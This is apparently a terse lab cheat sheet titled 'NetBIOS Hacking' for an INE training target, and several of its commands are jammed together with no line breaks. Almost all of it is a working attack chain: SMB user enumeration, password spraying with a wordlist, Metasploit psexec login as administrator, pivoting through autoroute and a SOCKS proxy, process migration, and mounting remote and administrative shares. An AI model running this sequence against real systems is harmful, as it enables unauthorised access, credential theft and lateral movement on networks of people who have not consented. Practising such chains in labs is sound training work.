NetBIOS Hacking
Last updated
Last updated
nmap -sSVC demo.ine.localrpcclient -U "" demo.ine.local -N -c "enumdomusers" | sed -E 's/^user:\[(.*)\] rid:\[.*\]$/\1/'crackmapexec smb demo.ine.local -u users.txt -p /usr/share/wordlists/metasploit/unix_passwords.txt --continue-on-success | grep "+"msfconsole -q
use exploit/windows/smb/psexec
set rhosts demo.ine.local
set smbuser administrator
set smbpass password1
runrun autoroute -s 10.2.29.52
backgroundcat /etc/proxychains4.confuse auxiliary/server/socks_proxy
set SRVPORT 9050
set VERSION 4a
run
jobssessions -i 1
migrate -N explorer.exe
shell
net view 10.2.29.52net use D: \\10.2.29.52\Documents
net use K: \\10.2.29.52\K$